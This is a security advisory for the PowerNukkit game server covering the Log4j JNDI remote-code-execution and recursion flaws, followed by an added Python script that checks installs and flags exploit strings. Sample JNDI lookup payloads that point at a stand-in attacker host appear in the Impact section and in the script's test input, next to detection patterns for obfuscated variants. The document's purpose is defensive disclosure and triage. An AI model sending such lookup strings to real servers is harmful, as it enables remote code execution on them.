Severity: Critical
CVSS Score: 10
### Summary

The Log4j version bundled by PowerNukkit, the library it uses for logging, is subject to a remote code execution vulnerability through its JNDI lookup, which is typically pointed at an attacker-controlled LDAP server. The issues are described in detail in [CVE-2021-44228](https://github.com/advisories/GHSA-jfh8-c2jp-5v3q) (JNDI lookup in log messages leading to remote code execution) and [CVE-2021-45105](https://github.com/advisories/GHSA-p6xc-xr62-6r2g) (uncontrolled recursion in self-referential lookups, leading to denial of service); both are fixed in Log4j `2.17.0`.

### Impact

Any string the server logs can trigger the lookup. A malicious client only has to send a message containing a lookup such as `${jndi:ldap://attacker-host/x}` (for example as a chat message); when the server logs it, Log4j resolves the lookup, fetches the referenced object from the attacker's server and executes attacker-supplied code on the server.

### Patches

PowerNukkit `1.5.2.1` is a patch release whose only change is updating the bundled Log4j to `2.17.0`; use it instead of `1.5.2.0`. All versions prior to `1.5.2.1` are affected and unpatched.

### Workarounds

If you cannot upgrade, start the server with the `-Dlog4j2.formatMsgNoLookups=true` JVM argument. This disables lookups in log message text and so blocks the `${jndi:...}` vector of CVE-2021-44228. Be aware of its limits: the property only exists in Log4j `2.10` through `2.14.1` (older versions ignore it), it affects message text only and not lookups performed elsewhere by the logging configuration, and it does nothing for CVE-2021-45105. Treat it as a stopgap until you upgrade to `1.5.2.1`.

### References

* https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
* https://github.com/advisories/GHSA-p6xc-xr62-6r2g

### For more information

If you have any questions or comments about this advisory:

* Open an issue in [the PowerNukkit repository](https://github.com/PowerNukkit/PowerNukkit/issues)
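Added example (not PowerNukkit project code): a small Python triage script that applies the Patches and Workarounds sections above to a server installation and flags the exploit vector from the Impact section. It assumes the PowerNukkit jar is a shaded jar that still carries log4j-core's `META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties` and `org/apache/logging/log4j/core/lookup/JndiLookup.class` entries at their standard paths (the exact PowerNukkit jar layout is an assumption), and that the server's JVM arguments are available as a list of strings. It classifies an install as patched (Log4j `2.17.0` or later), mitigated (the `formatMsgNoLookups` flag is set on a version where it exists, or `JndiLookup.class` was removed from the jar) or vulnerable, and it detects `${jndi:...}` lookups in logged strings, including the common `${lower:j}` and `${::-j}` obfuscations. The sample jars and chat messages are constructed inline; the function and constant names are the example's own.

```python
"""Triage helper for the PowerNukkit Log4j advisory (added example, not
project code). Assumptions: the server jar is a shaded jar that keeps
log4j-core's pom.properties and JndiLookup.class at their standard paths,
and the JVM arguments are available as a list of strings."""
import io
import re
import zipfile

FIXED_VERSION = (2, 17, 0)  # Log4j release shipped by PowerNukkit 1.5.2.1
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
NO_LOOKUPS_FLAG = "-Dlog4j2.formatMsgNoLookups=true"


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); a missing patch component counts as 0."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not m:
        raise ValueError("unparseable Log4j version: %r" % text)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def bundled_log4j(jar_bytes):
    """Return (log4j-core version tuple or None, JndiLookup.class present?)."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        names = set(jar.namelist())
        version = None
        if POM_PROPS in names:
            props = jar.read(POM_PROPS).decode("utf-8", "replace")
            for line in props.splitlines():
                if line.startswith("version="):
                    version = parse_version(line.split("=", 1)[1])
        return version, JNDI_LOOKUP_CLASS in names


def assess(jar_bytes, jvm_args):
    """Classify a server as 'patched', 'mitigated', 'vulnerable' or 'unknown'.

    'mitigated' means the CVE-2021-44228 message-lookup vector is closed by a
    workaround; the upgrade is still required (neither workaround addresses
    CVE-2021-45105).
    """
    version, has_jndi_lookup = bundled_log4j(jar_bytes)
    if version is None:
        return "unknown"          # no log4j-core metadata: inspect by hand
    if version >= FIXED_VERSION:
        return "patched"
    if not has_jndi_lookup:
        return "mitigated"        # JndiLookup.class stripped from the jar
    # formatMsgNoLookups only exists in Log4j 2.10 .. 2.14.1; on other
    # versions the flag is silently ignored, so it must not count.
    if NO_LOOKUPS_FLAG in jvm_args and (2, 10, 0) <= version <= (2, 14, 1):
        return "mitigated"
    return "vulnerable"


# --- exploit-attempt detection for logged strings (chat messages etc.) ---
_UNWRAP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)  # ${lower:j} -> j
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")               # ${::-j}, ${env:X:-j} -> j
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)


def normalize_lookups(msg):
    """Fold the usual obfuscations, innermost first, until nothing changes,
    so a split-up 'jndi' becomes literal again (case is left as-is; the
    detector below is case-insensitive)."""
    prev = None
    while prev != msg:
        prev = msg
        msg = _UNWRAP.sub(lambda m: m.group(1), msg)
        msg = _DEFAULT.sub(lambda m: m.group(1), msg)
    return msg


def is_exploit_attempt(msg):
    """True if the string carries a ${jndi:...} lookup, plain or obfuscated."""
    return bool(_JNDI.search(msg) or _JNDI.search(normalize_lookups(msg)))


def make_jar(version, with_jndi_lookup=True):
    """Constructed sample: a minimal in-memory jar shaped like shaded log4j-core."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        if version is not None:
            jar.writestr(POM_PROPS, "artifactId=log4j-core\nversion=%s\n" % version)
        if with_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes
    return buf.getvalue()


if __name__ == "__main__":
    for ver, args in (("2.14.1", []), ("2.14.1", [NO_LOOKUPS_FLAG]), ("2.17.0", [])):
        print("log4j %s args=%s -> %s" % (ver, args, assess(make_jar(ver), args)))
    for msg in ("hello ${player}", "${${lower:j}ndi:ldap://198.51.100.7:1389/a}"):
        print("%r -> %s" % (msg, is_exploit_attempt(msg)))
```

On a real install, pass the bytes of the server jar to `assess` together with the arguments from the start script; `unknown` means the jar carries no log4j-core metadata and should be inspected by hand. The detector is meant for triage of chat and server logs, not as a filter: strings it matches are evidence of an attempt, and only the `1.5.2.1` upgrade removes the exposure.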